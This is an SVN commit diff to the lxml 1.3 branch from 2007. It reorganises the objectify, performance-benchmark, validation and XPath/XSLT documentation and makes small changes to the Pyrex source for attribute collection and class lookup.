5.2 The DataElement factory + 5.3 Defining additional data classes + 6 What is different from lxml.etree? Setting up lxml.objectify -------------------------- +========================= -To make use of ``objectify``, you need both the ``lxml.etree`` module and +To set up and use ``objectify``, you need both the ``lxml.etree`` module and ``lxml.objectify``:: >>> from lxml import etree @@ -71,6 +82,13 @@ .. _`namespace specific classes`: element_classes.html#namespace-class-lookup +The lxml.objectify API +====================== + +In ``lxml.objectify``, element trees provide an API that models the behaviour +of normal Python object trees as closely as possible. + + Creating objectify trees ------------------------ @@ -315,7 +333,7 @@ ObjectPath ----------- +========== For both convenience and speed, objectify supports its own path language, represented by the ``ObjectPath`` class:: @@ -452,7 +470,7 @@ Python data types ------------------ +================= The objectify module knows about Python data types and tries its best to let element content behave like them. For example, they support the normal math @@ -485,6 +503,67 @@ >>> print root.d % (1234, 12345) 1234 - 12345 +However, data elements continue to provide the objectify API. This means that +sequence operations such as ``len()``, slicing and indexing (e.g. of strings) +cannot behave as the Python types. Like all other tree elements, they show +the normal slicing behaviour of objectify elements:: + + >>> root = objectify.fromstring("testtoast") + >>> print root.a + ' me' # behaves like a string, right? + test me + >>> len(root.a) # but there's only one 'a' element! + 1 + >>> [ a.tag for a in root.a ] + ['a'] + >>> print root.a[0].tag + a + + >>> print root.a + test + >>> [ str(a) for a in root.a[:1] ] + ['test'] + +If you need to run sequence operations on data types, you must ask the API for +the *real* Python value. The string value is always available through the +normal ElementTree ``.text`` attribute. Additionally, all data classes +provide a ``.pyval`` attribute that returns the value as plain Python type:: + + >>> root = objectify.fromstring("test5") + >>> root.a.text + 'test' + >>> root.a.pyval + 'test' + + >>> root.b.text + '5' + >>> root.b.pyval + 5 + +Note, however, that both attributes are read-only in objectify. If you want +to change values, just assign them directly to the attribute:: + + >>> root.a.text = "25" + Traceback (most recent call last): + ... + TypeError: attribute 'text' of 'StringElement' objects is not writable + + >>> root.a.pyval = 25 + Traceback (most recent call last): + ... + TypeError: attribute 'pyval' of 'StringElement' objects is not writable + + >>> root.a = 25 + >>> print root.a + 25 + >>> print root.a.pyval + 25 + +In other words, ``objectify`` data elements behave like immutable Python +types. You can replace them, but not modify them. + + +Recursive tree dump +------------------- To see the data types that are currently used, you can call the module level ``dump()`` function that returns a recursive string representation for @@ -544,64 +623,46 @@ a = 2 [IntElement] a = 3 [IntElement] -However, data elements continue to provide the objectify API. This means that -sequence operations such as ``len()``, slicing and indexing (e.g. of strings) -cannot behave as the Python types. Like all other tree elements, they show -the normal slicing behaviour of objectify elements:: - - >>> root = objectify.fromstring("testtoast") - >>> print root.a + ' me' # behaves like a string, right? - test me - >>> len(root.a) # but there's only one 'a' element! - 1 - >>> [ a.tag for a in root.a ] - ['a'] - >>> print root.a[0].tag - a - - >>> print root.a - test - >>> [ str(a) for a in root.a[:1] ] - ['test'] - -If you need to run sequence operations on data types, you must ask the API for -the *real* Python value. The string value is always available through the -normal ElementTree ``.text`` attribute. Additionally, all data classes -provide a ``.pyval`` attribute that returns the value as plain Python type:: - >>> root = objectify.fromstring("test5") - >>> root.a.text - 'test' - >>> root.a.pyval - 'test' +Recursive string representation of elements +------------------------------------------- - >>> root.b.text - '5' - >>> root.b.pyval - 5 +Normally, elements use the standard string representation for str() that is +provided by lxml.etree. You can enable a pretty-print representation for +objectify elements like this:: -Note, however, that both attributes are read-only in objectify. If you want -to change values, just assign them directly to the attribute:: + >>> objectify.enableRecursiveStr() - >>> root.a.text = "25" - Traceback (most recent call last): - ... - TypeError: attribute 'text' of 'StringElement' objects is not writable + >>> root = objectify.fromstring(""" + ... + ... 1 + ... 1.2 + ... 1 + ... true + ... what? + ... + ... + ... """) - >>> root.a.pyval = 25 - Traceback (most recent call last): - ... - TypeError: attribute 'pyval' of 'StringElement' objects is not writable + >>> print str(root) + root = None [ObjectifiedElement] + a = 1 [IntElement] + * attr1 = 'foo' + * attr2 = 'bar' + a = 1.2 [FloatElement] + b = 1 [IntElement] + b = True [BoolElement] + c = 'what?' [StringElement] + d = None [NoneElement] + * xsi:nil = 'true' - >>> root.a = 25 - >>> print root.a - 25 +This behaviour can be switched off in the same way:: -In other words, objectify data elements behave like immutable Python types. + >>> objectify.enableRecursiveStr(False) How data types are matched --------------------------- +========================== Objectify uses two different types of Elements. Structural Elements (or tree Elements) represent the object tree structure. Data Elements represent the @@ -636,6 +697,10 @@ classes used in these cases. By default, ``tree_class`` is a class called ``ObjectifiedElement`` and ``empty_data_class`` is a ``StringElement``. + +Type annotations +---------------- + The "type hint" mechanism deploys an XML attribute defined as ``lxml.objectify.PYTYPE_ATTRIBUTE``. It may contain any of the following string values: int, long, float, str, unicode, none:: @@ -727,6 +792,10 @@ l = 5 [IntElement] s = 5 [IntElement] + +The DataElement factory +----------------------- + For convenience, the ``DataElement()`` factory creates an Element with a Python value in one step. You can pass the required Python type name or the XSI type name:: @@ -863,45 +932,8 @@ after all references are gone and the Python object is garbage collected. -Recursive string representation of elements -------------------------------------------- - -Normally, elements use the standard string representation for str() that is -provided by lxml.etree. You can enable a pretty-print representation for -objectify elements like this:: - - >>> objectify.enableRecursiveStr() - - >>> root = objectify.fromstring(""" - ... - ... 1 - ... 1.2 - ... 1 - ... true - ... what? - ... - ... - ... """) - - >>> print str(root) - root = None [ObjectifiedElement] - a = 1 [IntElement] - * attr1 = 'foo' - * attr2 = 'bar' - a = 1.2 [FloatElement] - b = 1 [IntElement] - b = True [BoolElement] - c = 'what?' [StringElement] - d = None [NoneElement] - * xsi:nil = 'true' - -This behaviour can be switched off in the same way:: - - >>> objectify.enableRecursiveStr(False) - - -What is different from ElementTree? ------------------------------------ +What is different from lxml.etree? +================================== Such a different Element API obviously implies some side effects to the normal behaviour of the rest of the API. @@ -914,7 +946,8 @@ can access all children with the ``iterchildren()`` method on elements or retrieve a list by calling the ``getchildren()`` method. -* The find, findall and findtext methods use a different implementation as - they rely on the original iteration scheme. This has the disadvantage that - they may not be 100% backwards compatible, and the additional advantage that - they now support any XPath expression. +* The find, findall and findtext methods require a different implementation + based on ETXPath. In ``lxml.etree``, they use a Python implementation based + on the original iteration scheme. This has the disadvantage that they may + not be 100% backwards compatible, and the additional advantage that they now + support any XPath expression. Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Fri Jun 15 11:19:25 2007 @@ -1,40 +1,98 @@ +==================== Benchmarks and Speed ==================== +:Author: + Stefan Behnel + +.. meta:: + :description: Performance evaluation of lxml and ElementTree + :keywords: lxml performance, lxml.etree, lxml.objectify, benchmarks, ElementTree + + As an XML library, lxml.etree is very fast. It is also slow. As with all software, it depends on what you do with it. Rest assured that lxml is fast enough for most applications, so lxml is probably somewhere between 'fast enough' and 'the best choice' for yours. -This text describes where lxml.etree (lxe) excels, gives hints on some -performance traps and compares the overall performance to the original -ElementTree_ (ET) and cElementTree_ (cET) libraries by Fredrik Lundh. The -cElementTree library is a fast C-implementation of the original ElementTree. +This text describes where lxml.etree (abbreviated to 'lxe') excels, gives +hints on some performance traps and compares the overall performance to the +original ElementTree_ (ET) and cElementTree_ (cET) libraries by Fredrik Lundh. +The cElementTree library is a fast C-implementation of the original +ElementTree. .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm +.. contents:: +.. + 1 General notes + 2 How to read the timings + 3 Parsing and Serialising + 4 The ElementTree API + 4.1 Child access + 4.2 Element creation + 4.3 Merging different sources + 4.4 deepcopy + 4.5 Tree traversal + 5 XPath + 6 A longer example + 7 lxml.objectify + 7.1 ObjectPath + 7.2 Caching Elements + 7.3 Further optimisations + + +General notes +============= + +First thing to say: there *is* an overhead involved in having a DOM-like C +library mimic the ElementTree API. As opposed to ElementTree, lxml has to +generate Python representations of tree nodes on the fly when asked for them, +and the internal tree structure of libxml2 results in a higher maintenance +overhead than the simpler top-down structure of ElementTree. What this means +is: the more of your code runs in Python, the less you can benefit from the +speed of lxml and libxml2. Note, however, that this is true for most +performance critical Python applications. No one would implement fourier +transformations in pure Python when you can use NumPy. + +The up side then is that lxml provides powerful tools like tree iterators, +XPath and XSLT, that can handle complex operations at the speed of C. Their +pythonic API in lxml makes them so flexible that most applications can easily +benefit from them. + + +How to read the timings +======================= + The statements made here are backed by the (micro-)benchmark scripts `bench_etree.py`_, `bench_xpath.py`_ and `bench_objectify.py`_ that come with -the lxml source distribution. The timings cited below compare lxml 1.3 (with -libxml2 2.6.26) to the ElementTree and cElementTree versions shipped with -CPython 2.5 (based on ElementTree 1.2.6). They were run single-threaded on a -1.8GHz Intel Core Duo machine. +the lxml source distribution. They are distributed under the same BSD license +as lxml itself, and the lxml project would like to promote them as a general +benchmarking suite for all ElementTree implementations. New benchmarks are +very easy to add as tiny test methods, so if you write a performance test for +a specific part of the API yourself, please consider sending it to the lxml +mailing list. + +The timings cited below compare lxml 1.3 (with libxml2 2.6.27) to the +ElementTree and cElementTree versions shipped with CPython 2.5 (based on +ElementTree 1.2.6). They were run single-threaded on a 1.8GHz Intel Core Duo +machine under Ubuntu Linux 7.04 (Feisty). .. _`bench_etree.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_etree.py .. _`bench_xpath.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_xpath.py .. _`bench_objectify.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_objectify.py The scripts run a number of simple tests on the different libraries, using -different XML tree configurations: different tree sizes, with or without -attributes (-/A), with or without ASCII or unicode text (-/S/U), and either -against a tree or its serialised form (T/X). In the result extracts cited -below, T1 refers to a 3-level tree with many children at the third level, T2 -is swapped around to have many children below the root element, T3 is a deep -tree with few children at each level and T4 is a small tree, slightly broader -than deep. If repetition is involved, this usually means running the -benchmark in a loop over all children of the tree root, otherwise, the -operation is run on the root node (C/R). +different XML tree configurations: different tree sizes (T1-4), with or +without attributes (-/A), with or without ASCII string or unicode text +(-/S/U), and either against a tree or its serialised XML form (T/X). In the +result extracts cited below, T1 refers to a 3-level tree with many children at +the third level, T2 is swapped around to have many children below the root +element, T3 is a deep tree with few children at each level and T4 is a small +tree, slightly broader than deep. If repetition is involved, this usually +means running the benchmark in a loop over all children of the tree root, +otherwise, the operation is run on the root node (C/R). As an example, the character code ``(SATR T1)`` states that the benchmark was running for tree T1, with plain string text (S) and attributes (A). It was @@ -44,31 +102,14 @@ measurable. It is therefore not always possible to compare the absolute timings of, say, a single access benchmark (which usually loops) and a 'get all in one step' benchmark, which already takes enough time to be measurable -and is therefore measured as is. Take a look at the concrete benchmarks in -the scripts to understand how the numbers compare. - -.. contents:: -.. - 1 Bad things first - 2 Parsing and Serialising - 3 The ElementTree API - 4 Tree traversal - 5 XPath - 6 lxml.objectify - - -Bad things first ----------------- - -First thing to say: there *is* an overhead involved in having a DOM-like C -library mimic the ElementTree API. As opposed to ElementTree, lxml has to -generate Python objects on the fly when asked for them. What this means is: -the more of your code runs in Python, the slower your application gets. Note, -however, that this is true for most performance critical Python applications. +and is therefore measured as is. An example is the index access to a single +child, which cannot be compared to the timings for ``getchildren()``. Take a +look at the concrete benchmarks in the scripts to understand how the numbers +compare. Parsing and Serialising ------------------------ +======================= These are areas where lxml excels. The reason is that both parts are executed entirely at the C level, without major interaction with Python code. The @@ -111,30 +152,36 @@ ET : parse_stringIO (UAXR T3) 163.5361 msec/pass The expat parser allows cET to be up to 80% faster than lxml on plain parser -performance. Similar timings can be observer for the ``iterparse()`` -function. However, if you take a complete serialize-parse cycle, the numbers +performance. Similar timings can be observed for the ``iterparse()`` +function. However, if you take a complete input-output cycle, the numbers will look similar to these:: - lxe: write_utf8_parse_stringIO (S-TR T1) 316.6230 msec/pass - cET: write_utf8_parse_stringIO (S-TR T1) 592.1209 msec/pass - ET : write_utf8_parse_stringIO (S-TR T1) 817.9121 msec/pass - - lxe: write_utf8_parse_stringIO (UATR T3) 49.9680 msec/pass - cET: write_utf8_parse_stringIO (UATR T3) 434.6111 msec/pass - ET : write_utf8_parse_stringIO (UATR T3) 574.1441 msec/pass - - lxe: write_utf8_parse_stringIO (SATR T4) 1.2789 msec/pass - cET: write_utf8_parse_stringIO (SATR T4) 12.2640 msec/pass - ET : write_utf8_parse_stringIO (SATR T4) 15.6620 msec/pass + lxe: write_utf8_parse_stringIO (S-TR T1) 166.3210 msec/pass + cET: write_utf8_parse_stringIO (S-TR T1) 581.2099 msec/pass + ET : write_utf8_parse_stringIO (S-TR T1) 803.5331 msec/pass + + lxe: write_utf8_parse_stringIO (UATR T2) 184.4249 msec/pass + cET: write_utf8_parse_stringIO (UATR T2) 671.5119 msec/pass + ET : write_utf8_parse_stringIO (UATR T2) 924.3481 msec/pass + + lxe: write_utf8_parse_stringIO (S-TR T3) 9.1329 msec/pass + cET: write_utf8_parse_stringIO (S-TR T3) 77.9850 msec/pass + ET : write_utf8_parse_stringIO (S-TR T3) 157.0492 msec/pass + + lxe: write_utf8_parse_stringIO (SATR T4) 1.3900 msec/pass + cET: write_utf8_parse_stringIO (SATR T4) 12.6081 msec/pass + ET : write_utf8_parse_stringIO (SATR T4) 16.2580 msec/pass For applications that require a high parser throughput and do little serialization, cET is the best choice. Also for iterparse applications that extract small amounts of data from large XML data sets. If it comes to -round-trip performance, however, lxml tends to be 3-4 times faster in total. +round-trip performance, however, lxml tends to be 3-4 times faster in +total. So, whenever the input documents are not considerably bigger than the +output, lxml is the clear winner. The ElementTree API -------------------- +=================== Since all three libraries implement the same API, their performance is easy to compare in this area. A major disadvantage for lxml's performance is the @@ -144,9 +191,9 @@ (given in seconds):: lxe: -- S- U- -A SA UA - T1: 0.1155 0.1154 0.1153 0.1159 0.1181 0.1158 - T2: 0.1183 0.1197 0.1200 0.1267 0.1261 0.1264 - T3: 0.0341 0.0312 0.0314 0.0726 0.0717 0.0720 + T1: 0.1181 0.1080 0.1074 0.1088 0.1087 0.1099 + T2: 0.1103 0.1109 0.1164 0.1241 0.1203 0.1231 + T3: 0.0297 0.0309 0.0297 0.0716 0.0704 0.0703 T4: 0.0005 0.0004 0.0004 0.0014 0.0014 0.0014 cET: -- S- U- -A SA UA T1: 0.0290 0.0271 0.0275 0.0297 0.0273 0.0274 @@ -165,22 +212,26 @@ are no longer referenced. ET and cET represent the tree itself through these objects, which reduces the overhead in creating them. + +Child access +------------ + The same reason makes operations like ``getchildren()`` more costly in lxml. Where ET and cET can quickly create a shallow copy of their list of children, lxml has to create a Python object for each child and collect them in a list:: - lxe: root_getchildren (--TR T2) 0.3500 msec/pass + lxe: root_getchildren (--TR T2) 0.1960 msec/pass cET: root_getchildren (--TR T2) 0.0150 msec/pass ET : root_getchildren (--TR T2) 0.0091 msec/pass When accessing single children, however, e.g. by index, this handicap is negligible:: - lxe: first_child (--TR T2) 0.2499 msec/pass + lxe: first_child (--TR T2) 0.2289 msec/pass cET: first_child (--TR T2) 0.2048 msec/pass ET : first_child (--TR T2) 0.9291 msec/pass - lxe: last_child (--TR T1) 0.2511 msec/pass + lxe: last_child (--TR T1) 0.2310 msec/pass cET: last_child (--TR T1) 0.2148 msec/pass ET : last_child (--TR T1) 0.9191 msec/pass @@ -188,14 +239,18 @@ cET use Python lists here, which are based on arrays. The data structure used by libxml2 is a linked tree, and thus, a linked list of children:: - lxe: middle_child (--TR T1) 0.2921 msec/pass + lxe: middle_child (--TR T1) 0.2759 msec/pass cET: middle_child (--TR T1) 0.2069 msec/pass ET : middle_child (--TR T1) 0.9291 msec/pass - lxe: middle_child (--TR T2) 1.9028 msec/pass + lxe: middle_child (--TR T2) 1.7111 msec/pass cET: middle_child (--TR T2) 0.2089 msec/pass ET : middle_child (--TR T2) 0.9360 msec/pass + +Element creation +---------------- + As opposed to ET, libxml2 has a notion of documents that each element must be in. This results in a major performance difference for creating independent Elements that end up in independently created documents:: @@ -208,11 +263,11 @@ are supposed to end up in, either as SubElements of an Element or using the explicit ``Element.makeelement()`` call:: - lxe: makeelement (--TC T2) 2.5990 msec/pass + lxe: makeelement (--TC T2) 2.3680 msec/pass cET: makeelement (--TC T2) 0.3128 msec/pass ET : makeelement (--TC T2) 1.6940 msec/pass - lxe: create_subelements (--TC T2) 2.3072 msec/pass + lxe: create_subelements (--TC T2) 2.2051 msec/pass cET: create_subelements (--TC T2) 0.2370 msec/pass ET : create_subelements (--TC T2) 3.2189 msec/pass @@ -221,6 +276,10 @@ choice. Note, however, that the serialisation performance may even out this advantage, especially for smaller trees and trees with many attributes. + +Merging different sources +------------------------- + A critical action for lxml is moving elements between document contexts. It requires lxml to do recursive adaptations throughout the moved tree structure. @@ -254,19 +313,29 @@ cET: replace_children_element (--TC T1) 0.0238 msec/pass ET : replace_children_element (--TC T1) 0.1628 msec/pass -You should keep this difference in mind when you merge very large trees. On -the other hand, deep copying a tree is fast in lxml:: +You should keep this difference in mind when you merge very large trees. + + +deepcopy +-------- + +Deep copying a tree is fast in lxml:: + + lxe: deepcopy_all (--TR T1) 11.0400 msec/pass + cET: deepcopy_all (--TR T1) 119.6141 msec/pass + ET : deepcopy_all (--TR T1) 451.2160 msec/pass - lxe: deepcopy (--TC T1) 10.6010 msec/pass - cET: deepcopy (--TC T1) 220.2251 msec/pass - ET : deepcopy (--TC T1) 463.7730 msec/pass - - lxe: deepcopy (--TC T3) 8.2979 msec/pass - cET: deepcopy (--TC T3) 53.8740 msec/pass - ET : deepcopy (--TC T3) 118.2799 msec/pass + lxe: deepcopy_all (-ATR T2) 13.5410 msec/pass + cET: deepcopy_all (-ATR T2) 135.2482 msec/pass + ET : deepcopy_all (-ATR T2) 476.1350 msec/pass -So, for example, if you often need to create independent subtrees from a large -tree that you have parsed in, lxml is by far the best choice here. + lxe: deepcopy_all (S-TR T3) 4.2889 msec/pass + cET: deepcopy_all (S-TR T3) 36.0429 msec/pass + ET : deepcopy_all (S-TR T3) 113.4322 msec/pass + +So, for example, if you have a database-like scenario where you parse in a +large tree and then search and copy independent subtrees from it for further +processing, lxml is by far the best choice here. Tree traversal @@ -274,36 +343,36 @@ Another area where lxml is very fast is iteration for tree traversal. If your algorithms can benefit from step-by-step traversal of the XML tree and -especially if few elements are of interest or the element tag name is known, -lxml is a good choice:: +especially if few elements are of interest or the target element tag name is +known, lxml is a good choice:: - lxe: getiterator_all (--TR T2) 10.3800 msec/pass + lxe: getiterator_all (--TR T2) 6.4790 msec/pass cET: getiterator_all (--TR T2) 28.2831 msec/pass ET : getiterator_all (--TR T2) 26.0720 msec/pass - lxe: getiterator_islice (--TR T2) 0.1140 msec/pass + lxe: getiterator_islice (--TR T2) 0.0892 msec/pass cET: getiterator_islice (--TR T2) 0.2460 msec/pass ET : getiterator_islice (--TR T2) 26.6550 msec/pass - lxe: getiterator_tag (--TR T2) 0.3879 msec/pass + lxe: getiterator_tag (--TR T2) 0.3850 msec/pass cET: getiterator_tag (--TR T2) 9.3720 msec/pass ET : getiterator_tag (--TR T2) 22.8221 msec/pass - lxe: getiterator_tag_all (--TR T2) 0.8819 msec/pass + lxe: getiterator_tag_all (--TR T2) 0.7222 msec/pass cET: getiterator_tag_all (--TR T2) 27.2939 msec/pass ET : getiterator_tag_all (--TR T2) 22.8271 msec/pass -This similarly shows in ``Element.findall()``:: +This translates directly into similar timings for ``Element.findall()``:: - lxe: findall (--TR T2) 10.9370 msec/pass + lxe: findall (--TR T2) 6.8321 msec/pass cET: findall (--TR T2) 28.8639 msec/pass ET : findall (--TR T2) 27.1060 msec/pass - lxe: findall (--TR T3) 2.1989 msec/pass + lxe: findall (--TR T3) 1.3590 msec/pass cET: findall (--TR T3) 8.9881 msec/pass ET : findall (--TR T3) 6.4890 msec/pass - lxe: findall_tag (--TR T2) 0.9520 msec/pass + lxe: findall_tag (--TR T2) 0.9229 msec/pass cET: findall_tag (--TR T2) 27.2651 msec/pass ET : findall_tag (--TR T2) 22.7208 msec/pass @@ -316,7 +385,7 @@ XPath ------ +===== The following timings are based on the benchmark script `bench_xpath.py`_. @@ -359,8 +428,126 @@ lxe: xpath_class_repeat (--TC T4) 1.0269 msec/pass +A longer example +================ + +A while ago, Uche Ogbuji posted a `benchmark proposal`_ that would read in a +3MB XML version of the `Old Testament`_ of the Bible and look for the word +*begat* in all verses. Apparently, it is contained in 120 out of almost 24000 +verses. This is easy to implement in ElementTree using ``findall()``. +However, the fastest way to do this is obviously ``iterparse()``, as most of +the data is not of any interest. + +.. _`benchmark proposal`: http://www.onlamp.com/pub/wlg/6291 +.. _`Old Testament`: http://www.ibiblio.org/bosak/xml/eg/religion.2.00.xml.zip + +Now, Uche's original proposal was more or less the following:: + + def bench_ET(): + tree = ElementTree.parse("ot.xml") + result = [] + for v in tree.findall("//v"): + text = v.text + if 'begat' in text: + result.append(text) + return len(result) + +which takes about one second on my machine today. The faster ``iterparse()`` +variant looks like this:: + + def bench_ET_iterparse(): + result = [] + for event, v in ElementTree.iterparse("ot.xml"): + if v.tag == 'v': + text = v.text + if 'begat' in text: + result.append(text) + v.clear() + return len(result) + +The improvement is about 10%. At the time I first tried (early 2006), lxml +didn't have ``iterparse()`` support, but the ``findall()`` variant was already +faster than ElementTree. This changes immediately when you switch to +cElementTree. The latter only needs 0.17 seconds to do the trick today and +only some impressive 0.10 seconds when running the iterparse version. And +even back then, it was quite a bit faster than what lxml could achieve. + +Since then, lxml has matured a lot and has gotten much faster. The iterparse +variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is +even a little faster (which isn't the case for cElementTree). When you move +the whole thing to a pure XPath implementation, it will look like this:: + + def bench_lxml_xpath_all(): + tree = etree.parse("ot.xml") + result = tree.xpath("//v[contains(., 'begat')]/text()") + return len(result) + +This runs in about 0.13 seconds and is about the shortest possible +implementation (in lines of Python code) that I could come up with. Now, this +is already a rather complex XPath expression compared to the simple "//v" +ElementPath expression we started with. Since this is also valid XPath, let's +try this instead:: + + def bench_lxml_xpath(): + tree = etree.parse("ot.xml") + result = [] + for v in tree.xpath("//v"): + text = v.text + if 'begat' in text: + result.append(text) + return len(result) + +This gets us down to 0.12 seconds, thus showing that a generic XPath +evaluation engine cannot always compete with a simpler, tailored solution. +However, since this is not much different from the original findall variant, +we can remove the complexity of the XPath call completely and just go with +what we had in the beginning. Under lxml, this runs in the same 0.12 seconds. + +But there is one thing left to try. We can replace the simple ElementPath +expression with a native tree iterator:: + + def bench_lxml_getiterator(): + tree = etree.parse("ot.xml") + result = [] + for v in tree.getiterator("v"): + text = v.text + if 'begat' in text: + result.append(text) + return len(result) + +This implements the same thing, just without the overhead of parsing and +evaluating a path expression. And this makes it another bit faster, down to +0.11 seconds. For comparison, cElementTree runs this version in 0.17 seconds. + +So, what have we learned? + +* Python code is not slow. The pure XPath solution was not even as fast as + the first shot Python implementation. In general, a few more lines in + Python make things more readable, which is much more important than the last + 5% of performance. + +* It's important to know the available options - and it's worth starting with + the most simple one. In this case, a programmer would then probably have + started with ``getiterator("v")`` or ``iterparse()``. Either of them would + already have been the most efficient, depending on which library is used. + +* It's not always worth optimising. After all that hassle we got from 0.12 + seconds for the initial implementation to 0.11 seconds. Switching over to + cElementTree and writing an ``iterparse()`` based version would have given + us 0.10 seconds - not a big difference for 3MB of XML. + +* Take care what operation is really dominating in your use case. If we split + up the operations, we can see that lxml is slightly slower than cElementTree + on ``parse()`` (both about 0.06 seconds), but more visibly slower on + ``iterparse()``: 0.07 versus 0.10 seconds. However, tree iteration in lxml + is increadibly fast, so it can be better to parse the whole tree and then + iterate over it rather than using ``iterparse()`` to do both in one step. + Or, you can just wait for the lxml authors to optimise iterparse in one of + the next releases... + + lxml.objectify --------------- +============== The following timings are based on the benchmark script `bench_objectify.py`_. @@ -376,6 +563,10 @@ API, the create-discard cycles can become a bottleneck, as elements have to be instantiated over and over again. + +ObjectPath +---------- + ObjectPath can be used to speed up the access to elements that are deep in the tree. It avoids step-by-step Python element instantiations along the path, which can substantially improve the access time:: @@ -399,6 +590,10 @@ Note, however, that parsing ObjectPath expressions is not for free either, so this is most effective for frequently accessing the same element. + +Caching Elements +---------------- + A way to improve the normal attribute access time is static instantiation of the Python objects, thus trading memory for speed. Just create a cache dictionary and run:: @@ -436,12 +631,17 @@ is most effective for largely immutable trees. You should consider using a set instead of a list in this case and add new elements by hand. + +Further optimisations +--------------------- + Here are some more things to try if optimisation is required: * A lot of time is usually spent in tree traversal to find the addressed - elements in the tree. If you often work in subtrees, assign the parent of - the subtree to a variable or pass it into functions instead of starting at - the root. This allows accessing its descendents more directly. + elements in the tree. If you often work in subtrees, do what you would also + do with deep Python objects: assign the parent of the subtree to a variable + or pass it into functions instead of starting at the root. This allows + accessing its descendents more directly. * Try assigning data values directly to attributes instead of passing them through DataElement. Modified: lxml/branch/lxml-1.3/doc/validation.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/validation.txt (original) +++ lxml/branch/lxml-1.3/doc/validation.txt Fri Jun 15 11:19:25 2007 @@ -15,7 +15,7 @@ .. 1 DTD 2 RelaxNG - 2 XMLSchema + 3 XMLSchema The usual setup procedure:: @@ -78,6 +78,10 @@ >>> relaxng_doc = etree.parse(f) >>> relaxng = etree.RelaxNG(relaxng_doc) +Alternatively, pass a filename to the ``file`` keyword argument to parse from +a file. This also enables correct handling of include files from within the +RelaxNG parser. + You can then validate some ElementTree document against the schema. You'll get back True if the document is valid against the Relax NG schema, and False if not:: @@ -125,8 +129,8 @@ You can see that the error (ERROR) happened during RelaxNG validation (RELAXNGV). The message then tells you what went wrong. Note that this error -is local to the RelaxNG object. It will only contain log entries that -appeares during the validation. The DocumentInvalid exception raised by the +log is local to the RelaxNG object. It will only contain log entries that +appeared during the validation. The DocumentInvalid exception raised by the ``assertValid`` method above provides access to the global error log (like all other lxml exceptions). @@ -142,10 +146,9 @@ XMLSchema --------- -lxml.etree also has a XML Schema (XSD) support, using the class -lxml.etree.XMLSchema. This support is very similar to the Relax NG -support. The class can be given an ElementTree object to construct a -XMLSchema validator:: +lxml.etree also has XML Schema (XSD) support, using the class +lxml.etree.XMLSchema. The API is very similar to the Relax NG and DTD +classes. Pass an ElementTree object to construct a XMLSchema validator:: >>> f = StringIO('''\ ... @@ -160,9 +163,9 @@ >>> xmlschema_doc = etree.parse(f) >>> xmlschema = etree.XMLSchema(xmlschema_doc) -You can then validate some ElementTree document with this. Like with -RelaxNG, you'll get back true if the document is valid against the XML -schema, and false if not:: +You can then validate some ElementTree document with this. Like with RelaxNG, +you'll get back true if the document is valid against the XML schema, and +false if not:: >>> valid = StringIO('') >>> doc = etree.parse(valid) @@ -174,8 +177,8 @@ >>> xmlschema.validate(doc2) 0 -Calling the schema object has the same effect as calling its validate -method. This is sometimes used in conditional statements:: +Calling the schema object has the same effect as calling its validate method. +This is sometimes used in conditional statements:: >>> invalid = StringIO('') >>> doc2 = etree.parse(invalid) @@ -196,7 +199,7 @@ [...] AssertionError: Document does not comply with schema -Error reporting works like for the RelaxNG class:: +Error reporting works as for the RelaxNG class:: >>> log = xmlschema.error_log >>> error = log.last_error Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/xpathxslt.txt (original) +++ lxml/branch/lxml-1.3/doc/xpathxslt.txt Fri Jun 15 11:19:25 2007 @@ -274,11 +274,11 @@ >>> doc = etree.parse(f) >>> result_tree = transform(doc) -By default, XSLT supports all extension functions from libxslt and libexslt -as well as Python regular expressions through the `EXSLT regexp functions`_. +By default, XSLT supports all extension functions from libxslt and libexslt as +well as Python regular expressions through the `EXSLT regexp functions`_. Also see the documentation on `custom extension functions`_ and `document -resolvers`_. There is a separate section on `controlling access`_ to -external documents and resources. +resolvers`_. There is a separate section on `controlling access`_ to external +documents and resources. .. _`EXSLT regexp functions`: http://www.exslt.org/regexp/ .. _`document resolvers`: resolvers.html Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Fri Jun 15 11:19:25 2007 @@ -232,6 +232,29 @@ tree.xmlRemoveProp(c_attr) return 0 +cdef object _collectAttributes(xmlNode* c_node, int collecttype): + """Collect all attributes of a node in a list. Depending on collecttype, + it collects either the name (1), the value (2) or the name-value tuples. + """ + cdef xmlAttr* c_attr + c_attr = c_node.properties + attributes = [] + while c_attr is not NULL: + if c_attr.type == tree.XML_ATTRIBUTE_NODE: + if collecttype == 1: + item = _namespacedName(c_attr) + elif collecttype == 2: + item = _attributeValue(c_node, c_attr) + else: + item = (_namespacedName(c_attr), + _attributeValue(c_node, c_attr)) + + ret = python.PyList_Append(attributes, item) + if ret: + raise + c_attr = c_attr.next + return attributes + cdef object __RE_XML_ENCODING __RE_XML_ENCODING = re.compile( r'^(\s*<\?\s*xml[^>]+)\s+encoding\s*=\s*"[^"]*"\s*', re.U) Modified: lxml/branch/lxml-1.3/src/lxml/classlookup.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/classlookup.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/classlookup.pxi Fri Jun 15 11:19:25 2007 @@ -214,7 +214,7 @@ You can inherit from this class and override the method - lookup(type, doc, namespace, name) + lookup(self, type, doc, namespace, name) to lookup the element class for a node. Arguments of the method: * type: one of 'element', 'comment', 'PI' @@ -237,7 +237,9 @@ lookup = state - if c_node.type == tree.XML_COMMENT_NODE: + if c_node.type == tree.XML_ELEMENT_NODE: + element_type = "element" + elif c_node.type == tree.XML_COMMENT_NODE: element_type = "comment" elif c_node.type == tree.XML_PI_NODE: element_type = "PI" Modified: lxml/branch/lxml-1.3/src/lxml/dtd.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/dtd.pxi (original) +++ 